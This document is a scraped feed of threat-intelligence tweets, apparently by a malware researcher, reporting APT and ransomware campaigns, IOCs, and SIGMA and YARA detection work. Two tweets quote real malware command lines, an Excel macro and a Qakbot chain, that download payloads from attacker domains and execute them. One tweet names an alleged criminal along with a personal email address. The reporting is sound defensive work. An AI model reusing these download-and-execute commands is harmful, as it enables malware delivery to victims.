"Phishing domain tmobiie.us was created by Tyler Robert Buchanan aka "bobsagetfaget" or "BUCHANAN". You can see the reverse whois lookup result. The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email lululongstaffihw98@gmail.com under the username "bobsagetfaget." These domains were traced to his residence confirming his role in the groups https://t.co/HUQgImtn5P The FBI linked "BUCHANAN" to Scattered Spider through phishing domains like fake Okta sites registered on NameCheap using the email"
X Link 2024-11-20T19:51Z [----] followers, 18.5K engagements
"Hi everyone I started a new Github repo for sharing Anti Debugging techniques and ways to defat it for malware analysis 🚩 if you are interested in I paste the link below : https://github.com/whichbuffer/Antidebug https://github.com/whichbuffer/Antidebug"
X Link 2022-08-05T10:10Z [----] followers, [---] engagements
"Unpacked Bumblebee loader performing some anti analysis checks this technique was copied from open source project called "al-khaser" :=)"
X Link 2022-08-13T17:03Z [----] followers, [---] engagements
"Fake CVE exploit POCs especially for high-profile vulnerabilities like CVE-2024-38063 are unfortunately a common tactic used by malicious actors to distribute malware over Github. https://www.virustotal.com/gui/file/0dfa551e2b12af0991714a3e5be26c9a4c00f7663f065dbf4d8b84c9abc7b97a/detection https://www.virustotal.com/gui/file/0dfa551e2b12af0991714a3e5be26c9a4c00f7663f065dbf4d8b84c9abc7b97a/detection"
X Link 2024-08-17T21:40Z [----] followers, 18.6K engagements
"I mapped Iranian-linked cyber operations following Operation Rising Lion. Each event is attributed to a specific threat actor there is a blend of hacktivist and state-sponsored activities. Their targeting goes beyond Israel extending to critical sectors like defense contractors in the United States and United Kingdom"
X Link 2025-06-17T15:09Z [----] followers, 13.1K engagements
"I found some infrastructure overlaps between FIN7 and UNC2633. The IP address 94.140.114.173 was employed by FIN7 (POWERTRASH - Diceloader) also used by UNC2633 to deliver QakBot malware. CC @BushidoToken Here are the details : https://www.virustotal.com/graph/embed/ga23be81785b74a4f8abd9ff33a5cf0accbac701a1ef34d5888f30ecf3a4b96fatheme=dark https://www.virustotal.com/graph/embed/ga23be81785b74a4f8abd9ff33a5cf0accbac701a1ef34d5888f30ecf3a4b96fatheme=dark"
X Link 2023-06-05T13:00Z [----] followers, 18.6K engagements
"Today I created this video to show basics of detection engineering and walk you through building SIGMA rules from scratch using Sysmon & Windows Event Logs. 🎥 Detection Engineering with SIGMA Rules 💡 What you'll learn: - Fundamentals of Sysmon & Windows Event Logs - Malware analysis to understand attack patterns - Event log analysis to extract key indicators - Writing SIGMA rules for effective threat detection - Testing detections in a sandbox environment with AURORA Agent. 📌 If you're into threat hunting detection engineering or malware analysis this is for you 💬 Share your thoughts &"
X Link 2025-02-08T14:31Z [----] followers, 16.2K engagements
"The Pakistan Airports Authority (PAA) appears to have been compromised their email infrastructure being used to distribute password-protected ZIP archives containing a previously undocumented malware. The payload is disguised with an .MCU file extension masquerading as a legitimate Excel document. The phishing campaign leverages a lure titled Telecom Sector Collaboration for Aviation Modernization clearly tailored to target the telecommunications industry within Pakistan. Interestingly I found an easter egg inside the remote host the threat actor behind the campaign claims affiliation with"
X Link 2025-06-12T23:08Z [----] followers, 22.4K engagements
"A Pro-Iranian hacktivist group APT-Iran used RDP access to exfiltrate data and deploy LockBit Black ransomware samples to encrypt files. In a separate incident the threat actor claimed to have compromised the Israel Ministry of Healths network by exploiting an F5 BIG-IP vulnerability"
X Link 2025-06-30T18:52Z [----] followers, 15.2K engagements
"ShinyHunters have released their exploit tool for SAP NetWeaver Visual Composer (CVE-2025-31324). While analysing the Base64-encoded Java payload I spotted an unusual marker string: "Pwner274576528033300""
X Link 2025-08-15T13:58Z [----] followers, 11.3K engagements
"After getting Initial Access on a victim device an unknown threat actor (46.41.54.35) using public SMB share to execute AnyDesk and create a user account named "sql" to get Persistence access on victim device. @malwrhunterteam @JAMESWT_MHT"
X Link 2022-05-18T20:08Z [----] followers, [---] engagements
"🚨 EclecticIQ analysts uncovered a Sandworm #cyber espionage campaign targeting Ukrainian Windows users. Attackers used trojanized #Microsoft KMS activation tools to deploy the BACKORDER loader and Dark Crystal RAT enabling data theft and espionage. https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns"
X Link 2025-02-11T15:18Z [----] followers, 18.7K engagements
"Threat actor has been observed targeting Colombian government entities including Consorcio Fopep under the Ministry of Labor via a phishing campaign that uses malicious SVG email attachments. When a victim opens the attached SVG file it downloads a second-stage malware payload packaged inside a password-protected ZIP archive. This payload initiates the delivery of the Remcos Remote Access Trojan (RAT) via DLL sideloading. The threat actor abused ciscosparklauncher.dll to launch the Remcos RAT. Additionally they loaded the vulnerable driver zamguard64.sysassociated with Zemana Anti-Malwareto"
X Link 2025-04-12T20:50Z [----] followers, 10.1K engagements
"Malicious Document targeting Azerbaijan Government by Phishing Attack. I also found an #opendir "172.86.75.220" that contains Cobalt Strike new malware samples and "arxiv.rar" (contains same Malicious Document ) https://www.virustotal.com/gui/file/f3d8916b99d7e6301a885b2ec4aaf9635f1713464c53b1604d3b4e1abd673c36 https://www.virustotal.com/gui/file/f3d8916b99d7e6301a885b2ec4aaf9635f1713464c53b1604d3b4e1abd673c36"
X Link 2022-11-09T07:03Z [----] followers, [---] engagements
"New Icedid Malware campaign Phishing Email Encrypted ZIP ISO image LNK DLL execution via Rundll32.exe f3a9b733cb33c4d257589e70c8d9cf4b5136cb3932bce2ea1b31bc9d5b06a5ae C2: trbiriumpa.com Unpacked Sample - b1566f9c7ffa839554b96575e2a34ea79416f03df75b5048f561e96808975555"
X Link 2022-12-26T19:41Z [----] followers, 17.6K engagements
"Decrypting XOR Encrypted Strings from Qakbot Malware. Same XOR function called [--] times and every XOR key is different. https://www.virustotal.com/gui/file/e60d2c82e95df823c9dc20214260054af00b56e5ad7a0e43c391f6b896556040 https://www.virustotal.com/gui/file/e60d2c82e95df823c9dc20214260054af00b56e5ad7a0e43c391f6b896556040"
X Link 2022-11-05T18:31Z [----] followers, [---] engagements
"Brief analysis of compromised 3CXDesktopApp: Digitally Signed 3CXDesktopApp Installer Install itself on registry for Persistence "C:UsersREAppDataLocalPrograms3CXDesktopApp3CXDesktopApp.exe" autoLaunch" DLL Side Loading with dropped DLL payload called 'ffmpeg.dll'"
X Link 2023-03-30T15:25Z [----] followers, 17.4K engagements
"Threat actors actively abuse "Robocopy" (a built-in Windows utility) to deliver malware from WebDAV. You can quickly detect this behavior by using SIGMA rule: Malware Sample: https://bazaar.abuse.ch/sample/62fce3f773ec3911fe1a20d3aca1fced6c1a5afa4d8f58711e49232b7dc9c111 https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml https://bazaar.abuse.ch/sample/62fce3f773ec3911fe1a20d3aca1fced6c1a5afa4d8f58711e49232b7dc9c111"
X Link 2025-06-30T12:54Z [----] followers, [----] engagements
"FIN7 infrastructure used to deliver POWERTRASH loader. According to @CISACyber same infrastructure used to exploit CVE-2023-27350 PaperCut. @h2jazi @MsftSecIntel https://www.virustotal.com/graph/embed/g65ae58b36933476ebb5d1288d1cd438ff0bea8e5c49d4424ad46b4d2bcf7b918theme=dark https://www.virustotal.com/graph/embed/g65ae58b36933476ebb5d1288d1cd438ff0bea8e5c49d4424ad46b4d2bcf7b918theme=dark"
X Link 2023-05-20T08:45Z [----] followers, 18.5K engagements
"🚨New research reveals a cyber espionage campaign targeting Indian government including agencies responsible for electronic communications IT governance and national defense. Full details on the tactics and implications are here: #CyberSecurity #Malware https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign"
X Link 2024-03-27T11:21Z [----] followers, 18.8K engagements
"New Raccoon Stealer campaign 🦝 greencracks.com - Cracked MalwareBytes Lure @MBThreatIntel DGA and bit.ly abused to redirect the initial downloader. Racoon Stealer C2 Panel : http://94.131.106.116 MD5 Hash: (27909cdf575b73bba157c6437aaf6417) @JAMESWT_MHT @cyb3rops"
X Link 2022-09-17T13:16Z [----] followers, [---] engagements
"@ersincmt Merhaba Ersin bey Infinitum IT Siber Tehdit stihbarat ekibi yaklak [--] hafta nce bu saldr ile ilgili bir analiz almas gerekletirdi. Analiz raporunu Trke olarak paylatk ilgilenirseniz linki brakyorum https://www.linkedin.com/posts/infinitumlabs_t%C3%BCrkiyedeki-devlet-kurumlar%C4%B1n%C4%B1-hedef-alan-activity-6962042931998277632-OKZSutm_source=linkedin_share&utm_medium=member_desktop_web https://www.linkedin.com/posts/infinitumlabs_t%C3%BCrkiyedeki-devlet-kurumlar%C4%B1n%C4%B1-hedef-alan-activity-6962042931998277632-OKZSutm_source=linkedin_share&utm_medium=member_desktop_web"
X Link 2022-08-20T15:30Z [----] followers, [--] engagements
"Observed IP's exploiting CVE-2023-36884: 74.50.94.156 104.234.239.26 94.232.40.34 66.23.226.102"
X Link 2023-07-12T19:02Z [----] followers, 29.7K engagements
"Malware Deobfuscation with @OpenAI Remcos malware delivery via ISO Obfuscated VBS Powershell Download Second Stage Inject into ielowutil.exe Injected Remcos: https://tria.ge/230812-t6nmbscf33/static1 https://tria.ge/230812-t6nmbscf33/static1"
X Link 2023-08-12T16:46Z [----] followers, 15K engagements
"@GossiTheDog @BushidoToken @Gi7w0rm This is the reproduced malware that execute calc.exe as poc"
X Link 2022-05-29T14:03Z [----] followers, [---] engagements
"DarkPink APT activity continues with a rice trade lure: ISO WinWord.exe DLL SideLoading Winlogon Persistence MD5: 98beb20ef1e4d629965c9132be8feb07 (Update Counterdraft on the MoU on Rice) @h2jazi @malwrhunterteam @ShadowChasing1"
X Link 2023-05-17T13:40Z [----] followers, 13.8K engagements
"Ivanti EPMM stored MySQL creds in cleartext (/mi/files/system/.mifpp). Threat actors accessed the DB and exfiltrating mobile device metadata (IMEI SIM location) LDAP configs and Office [---] tokens from potentially thousands of victims. Read more here: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"
X Link 2025-05-22T07:20Z [----] followers, [----] engagements
"#APT #Gamaredon Malicous HTA files contains Base-64 Encoded VBscript 6bd8ff39e46e501c7d3ece116861121207741abb92f5e12a527cdf8b7c2c4cb8 9e1d16b50209d83aaa92ad8391982d99a9cee280e51cfe2c5b9c080599697837 C2: t.me/s/oearps 137.184.2.98/jug/71.aif=Function"
X Link 2023-01-21T20:28Z [----] followers, 14.3K engagements
"@thegrugq Also this is suspicious.A pull request for Googles oss-fuzz is opened that changes the URL for the project from to http://xz.tukaani.org/xz-utils/ http://tukaani.org/xz/ http://xz.tukaani.org/xz-utils/ http://tukaani.org/xz/"
X Link 2024-03-29T21:47Z [----] followers, 15.5K engagements
"When Lazarus gets an reverse shell on my sandbox device"
X Link 2023-04-20T12:41Z [----] followers, [----] engagements
"Tomorrow I will share my findings about new Lockbit [---] Ransomware sample. Details for defending your organization against this attack will be shared in this report. Stay tuned :)"
X Link 2022-07-04T17:11Z [----] followers, [--] engagements
"Summary of the Treasury Department breach (per public sources): A key unresolved cybersecurity issue lies in securing third-party vendor relationships. cc @BushidoToken @DrunkBinary @cyb3rops @TLP_R3D"
X Link 2025-01-06T19:21Z [----] followers, [----] engagements
"New Lockbit [---] Ransomware sample with YARA match @malwrhunterteam @struppigel https://www.virustotal.com/gui/file/0d38f8bf831f1dbbe9a058930127171f24c3df8dae81e6aa66c430a63cbe0509/detection https://www.virustotal.com/gui/file/0d38f8bf831f1dbbe9a058930127171f24c3df8dae81e6aa66c430a63cbe0509/detection"
X Link 2022-07-16T13:48Z [----] followers, [--] engagements
"Related : (Installing Cobalt Strike shellcode by using picture) ab8fbe7e6341b306357fe4ca954f73031baa2774fb025583720ac12490612819 hxxp://47.102.122.197/1.jpg Decrypted Shellcode 7e859f2a3d5e885f06d42bd740cd4b6aff19891e9d33bc9789eb38e2a4285898 Cobalt Strike C2 hxxp://47.102.122.197:9999/q2Iq #Golang #Shellcode Injector MD5: c81184751669277a6de15de36f33138d C2: 117.50.62.88:9903 Definitely interesting🤔 https://t.co/worVSXpO4k #Golang #Shellcode Injector MD5: c81184751669277a6de15de36f33138d C2: 117.50.62.88:9903 Definitely interesting🤔 https://t.co/worVSXpO4k"
X Link 2023-04-18T17:44Z [----] followers, 23.7K engagements
"#Golang #Shellcode Injector MD5: c81184751669277a6de15de36f33138d C2: 117.50.62.88:9903 Definitely interesting🤔"
X Link 2021-02-26T23:07Z 25.5K followers, [--] engagements
"On May [--] [----] following heightened IndiaPakistan tensions Pakistan Telecommunication Company (PTCL) was hit by a phishing attack leveraging a spoofed email appearing to be from Pakistans Counter Terrorism Department using a Security Brief Report lure to deceive recipients. The email carried an ICQ (Excel Web Query) attachment. Once opened it connected to fogomyart.com/random.php and executed an Excel macro with the following command: =cmd' /c cd C:programdata & set /P="MZ"nulb1 & curl -o b2 https://fogomyart.com/vcswin & copy /b b1+b2 vcswin.exe & start /b vcswin.exe'A0 This command"
X Link 2025-05-11T10:04Z [----] followers, [----] engagements
"🕵Gamaredon #APT activity targeting State Bureau of Investigation in Ukraine (DBR or ): Phishing email - XHTML Smuggling Payload - Download RAR - LNK - MSHTA LOLBIN Download third stage Email: 27515d71b91bbdbb55437de6b729663c0cd206d7112ddbc439d82d8a6e1dde3e HTML Payload: b5d59bb932843ca58c29971e73edfe642731701f29133eb1cfb8841e198d567f Download Second Stage RAR file from: entities-important-surgeon-ever.trycloudflare.com LNK File: 35f714c491897d32c7c68386dac02615071ae4587729dc46d524c6e468ac1cbe"
X Link 2024-12-06T14:41Z [----] followers, [----] engagements
"Cyber Army of Russia Reborn (CARR) is an Hacktivist Telegram persona associated with #APT44 by @Mandiant. CARR prepared an training for DDOS attacks against Ukrainian targets you can see the username of the device is "SergoZar" which is likely associated with Github user "SergoZar". Persona "SergoZar" is using a public portfolio page and following himself which is Mr. Alexander Ryabov aka "ZKelo" or "SergoZar". It's just an assumption I'm not linking to Cyber Army of Russia Reborn (CARR) to this gentlemen but for me this profile is matching an interesting link. What you thing @BushidoToken"
X Link 2024-04-19T21:31Z [----] followers, 18.5K engagements
"#Qakbot Claim_Copy_3519_Sep_20.html - ISO - LNK - JS - BAT - regsvr32 - Load times.db (DLL) times.db: 29ac39065f707311a3281268b643a66fdbd2d08c01eaea8bf6229364c69201a6 @malwrhunterteam @Gi7w0rm @Max_Mal_ @pr0xylife"
X Link 2022-09-23T17:21Z [----] followers, [--] engagements
"🚨Here is my analysis on GLOBAL GROUP RaaS. I identified the IP address behind their Tor-based Dedicated Leak Site (DLS): 193.19.119.4. The server is hosted by IpServer a Russia-based VPS provider also previously used to host the DLS infrastructure for the Mamona RIP ransomware operation. The GLOBAL GROUP RaaS manager (alias $$$) actively seeks remote access to corporate networks via Initial Access Brokers (IABs). Targeting enterprise VPN appliances (Fortinet Palo Alto Cisco) and routinely acquires RDP access to high value targets."
X Link 2025-07-15T07:57Z [----] followers, 16.6K engagements
"EclecticIQ links GLOBAL GROUP to the actor behind BlackLock RaaS. This group uses AI-powered ransom negotiations & a mobile control panel targeting healthcare & automotive sectors in the US UK and Europe. 👉 Learn more: #cybersecurity #ransomware https://hubs.ly/Q03xcYK00 https://hubs.ly/Q03xcYK00"
X Link 2025-07-15T06:55Z [----] followers, 10.6K engagements
"@vxunderground The page used some Turkish language and it appears that the CSS code was copied and pasted from a random Turkish forum"
X Link 2023-05-08T21:50Z [----] followers, [----] engagements
"Don't touch our home routers dude it's creepy 😐. According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a modified version of the Fast https://t.co/6RoMEnu5Un According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a"
X Link 2024-05-11T20:31Z [----] followers, [----] engagements
"google-drive.zip 😂 @malwrhunterteam"
X Link 2023-05-19T19:12Z [----] followers, [----] engagements
"Fresh #GOZI sample with [--] detection in VT. Exectuion flow: ZIP (QuickBooks-IXAUYWQ) LNK msiexec MD5: 82ff84cb9924f0855a894e75b5d3edb2 C2:sumarno.top @malwrhunterteam @StopMalvertisin @1ZRR4H https://tria.ge/230525-2j1x5sdd61/behavioral1 https://tria.ge/230525-2j1x5sdd61/behavioral1"
X Link 2023-05-25T22:47Z [----] followers, [----] engagements
"2nd stage of PowerShell Bumblebee loader De-Obfuscated feel free to take a look : cc @Gi7w0rm @malwrhunterteam @BushidoToken https://gist.github.com/whichbuffer/0c109be7b8b01d13178c07d66cdf82d5 https://gist.github.com/whichbuffer/0c109be7b8b01d13178c07d66cdf82d5"
X Link 2022-09-07T08:22Z [----] followers, [--] engagements
"@malwrhunterteam @JAMESWT_MHT I also wanted to mentioned an awesome tool called HashDBI used for Reverse Engineering the API Hashing @herrcore it sped up the analysis process 👏 Lockbit Decrypter was using "FNV-1a non-cryptographic hash function" for hiding the Import Tables. https://github.com/OALabs/hashdb https://github.com/OALabs/hashdb"
X Link 2022-06-20T12:11Z [----] followers, [--] engagements
"I can confirm that the latest patch #microsoft #windows CVE-2022-26925 was related to PetitPotam founded by @topotam77. An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using NTLM"
X Link 2022-05-11T06:46Z [----] followers, [--] engagements
"@h4x0r_dz It's not from Microsoft for sure 😅"
X Link 2024-04-25T19:20Z [----] followers, 13.6K engagements
"Likely a APT-C-55Kimsuky) activity: ISO LNK BAT AV vendor check (Kaspersky or Avast) Download Second Stage (HTA) MD5: 5b39fc810261ce179e8348e11a840c15 URL: trusteer.ink/rapport/32.hta Previous activity similar to this : MD5: 7753f37dfbc44815282433f16b56c0ce"
X Link 2023-05-16T17:53Z [----] followers, [----] engagements
"🕷🕸SCATTERED SPIDER phishing activities: Registrar: - Hosting Concepts B.V. d/b/a Registrar EU iuiuiemon.com - 2024-11-13 vision-victra.com - 2024-11-09 cc @BushidoToken @malwrhunterteam @TLP_R3D @AlvieriD @ImposeCost"
X Link 2024-11-25T14:53Z [----] followers, [----] engagements
"More Racoon Stealer IOCs 🦝 MD5 Hash: 5261d68f844325d038c8b1d7d215a91e C2 Servers: 94.131.104.18 45.67.229.149 Downloader: http://193.149.129.144/rgd4rgrtrje62iuty/19658963328526236.bin cc @malwrhunterteam @malware_traffic"
X Link 2022-09-18T15:50Z [----] followers, [--] engagements
"Pivoting possible Volt Typhoon infrastructure Each of the infrastructure is using: SSL Certifacte C=en ST=rg L=df O=vb OU=ty CN=jdyfj nginx 1.20.1 and redirect to google 2.58.15.30 66.85.27.190 45.32.174.131 cc @DrunkBinary @TomHegel @BushidoToken"
X Link 2024-04-25T21:06Z [----] followers, [----] engagements
"Russian cybercriminals behind the DanaBot malware built a version specifically to target government and military entities. Theres no direct proof Russian intelligence is involved but its likely they benefit from or use the tools and access these backdoored systems. https://www.justice.gov/usao-cdca/pr/16-defendants-federally-charged-connection-danabot-malware-scheme-infected-computers https://www.justice.gov/usao-cdca/pr/16-defendants-federally-charged-connection-danabot-malware-scheme-infected-computers"
X Link 2025-05-23T19:25Z [----] followers, [----] engagements
"Reversing Go binary on IDA. We can see that it's being used for getting Initial Access on victim device by communicating with C2_IP over port [----] and Powershell.exe will be used as default Command and Scripting Interpreter by the attacker. @malwrhunterteam"
X Link 2022-07-27T19:15Z [----] followers, [--] engagements
"The SAP NetWeaver exploit (CVE-2025-31324) is seriously bad. Ive seen some of the targets its horrifying. There are critical infrastructure networks affected 😬"
X Link 2025-04-30T22:38Z [----] followers, [----] engagements
"There is a lot of disinformation and counterintelligence activity circulating in Telegram channels. If you are a journalist or a CTI analyst stay cautious your role is to provide accurate information not to amplify the hype"
X Link 2025-08-21T13:38Z [----] followers, [----] engagements
"Just use Linux nerds"
X Link 2024-07-19T09:40Z [----] followers, [----] engagements
"Rhadamanthys info stealer malware using EU GDPR phishing lure. After the execution it opens an PDF document as a part of the lure. C2: 141.98.82.254 41f7c8ae34676fe524a70b8474e1c31c42d70301edf091c1e8ae320b7f3d1646"
X Link 2022-12-28T13:18Z [----] followers, [----] engagements
"@hackerfantastic lmao"
X Link 2025-03-07T18:36Z [----] followers, [----] engagements
"PlugX Payload (work2022.tmt) is encrypted with an XOR key "0x1E43" it's being decrypted by PlugX loader "LMIGuardianDLL.dll" on execution. Decrypted payload can be found here Decrypted PlugX config file can be seen in image https://www.virustotal.com/gui/file/a9f7d06b9929be61853910876129318ef56efd1eaef168e9ac412a090a6f09danocache=1 #MustangPanda #APT Summary MSs reporting - recommendationl.zip ecb1650d5f548f10be47aaa84f7546c0 Summary MSs reporting - recommendationl.doc.lnk 2db2698bd4c922a04db0839e6fc1146b LMIGuardianDll.dll aa47fc240f70945b80413ac3c714e2a2 LMIGuardianDat.dat"
X Link 2023-01-05T14:26Z [----] followers, [----] engagements
"#MustangPanda #APT Summary MSs reporting - recommendationl.zip ecb1650d5f548f10be47aaa84f7546c0 Summary MSs reporting - recommendationl.doc.lnk 2db2698bd4c922a04db0839e6fc1146b LMIGuardianDll.dll aa47fc240f70945b80413ac3c714e2a2 LMIGuardianDat.dat"
X Link 2023-01-05T11:27Z 16.4K followers, 21.1K engagements
"Ukrainian City Councils (Pechersk and Khmelnytskyi) were very likely targeted by an unknown threat actor. A spear-phishing email was used to deliver an encrypted RAR attachment containing Remcos RAT. https://www.virustotal.com/gui/file/af600672e924a603bd96687954d7bb26950f1e891d923bff99981a91a0626026 https://www.virustotal.com/gui/file/af600672e924a603bd96687954d7bb26950f1e891d923bff99981a91a0626026"
X Link 2023-02-23T19:23Z [----] followers, [----] engagements
"Qilin ransomware affiliate hastalamuerte claims he lost $48K after a ransom negotiation mysteriously disappeared from a Tox chat. In the same thread another actor Nova posted credentials and a screenshot of Qilins affiliate panel to embarrass the group. ji57fr53anp7wb44tbbnp72qcgbhqywy4jmbncawdcrejj5amuvh3zqd.onion"
X Link 2025-07-31T14:58Z [----] followers, [----] engagements
"CheckZilla is being used by Threat Actors for calculating the evasiveness of a #Malware automatically the idea is unlike the VirusTotal it don't sends meta data to AV vendors CheckZilla also being advertised under RAMP forum. @malwrhunterteam @JAMESWT_MHT"
X Link 2022-07-02T09:23Z [----] followers, [--] engagements
"Arkana Ransomware affiliates likely targeted the WideOpenWest (ISP in California) by compromising Appian (code automation platform) and Symphonica (cloud-native orchestration platform). Some key cloud security takeaways: 1- Avoid exposing company identifiers (e.g. name SSL certs logo) in cloud assets. 2- Continuously monitor for leaked or reused credentials. 3- Audit third-party SaaS configurations and access permissions regularly. 4- Use 2FA :( cc @BushidoToken @vxunderground @DrunkBinary @LawrenceAbrams https://web.archive.org/web/20250324043643/https://wowinc.appiancloud.com/suite/ Arkana"
X Link 2025-03-25T08:52Z [----] followers, [----] engagements
"Arkana ransomware group claims to have compromised an Internet Service Provider in California. They were even nice enough to put together a music video montage illustrating the level of access they possess"
X Link 2025-03-25T02:47Z 418K followers, 63.1K engagements
"I'm following a generic backdoor that I named as "Kerper" because of the PDB file path. The C2 connections depend on the variations. So far I have seen that Microsoft Graph API and Microsoft Azure (akams.azurewebsites.net) services were abused"
X Link 2023-03-30T17:25Z [----] followers, [----] engagements
"YARA rule to detect this new camping. https://github.com/whichbuffer/eiq-community-exchange/blob/30d58253c6bc29bf223fd55c4af6ac0701b537e6/yara/Windows_1000-1999/Y1801.yara#L70 #Qakbot - BB14 - .one .cmd .ps .dll cmd.exe /c Open.cmd powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:programdataputty.jpg rundll32 C:programdataputty.jpgWind IOC's https://t.co/iJ3jXKg9aB https://t.co/5kmcgUPnIh https://github.com/whichbuffer/eiq-community-exchange/blob/30d58253c6bc29bf223fd55c4af6ac0701b537e6/yara/Windows_1000-1999/Y1801.yara#L70 #Qakbot - BB14 - .one .cmd .ps .dll"
X Link 2023-02-07T22:51Z [----] followers, [----] engagements
"#Qakbot - BB14 - .one .cmd .ps .dll cmd.exe /c Open.cmd powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:programdataputty.jpg rundll32 C:programdataputty.jpgWind IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB14_07.02.2023.txt https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB14_07.02.2023.txt"
X Link 2023-02-07T21:44Z 21.1K followers, 34.6K engagements
"🎉 Happy to share that my talk has been accepted at @virusbtn Ill be presenting in Berlin on Friday September [--] at #VB2025: Details: See you there #vbconference https://www.virusbulletin.com/conference/vb2025/abstracts/cracked-gru-how-russias-notorious-sandworm-unit-weaponizes-pirated-software-usage-target-ukraine/ https://www.virusbulletin.com/conference/vb2025/abstracts/cracked-gru-how-russias-notorious-sandworm-unit-weaponizes-pirated-software-usage-target-ukraine/"
X Link 2025-05-02T14:17Z [----] followers, [----] engagements
Limited data mode. Full metrics available with subscription: lunarcrush.com/pricing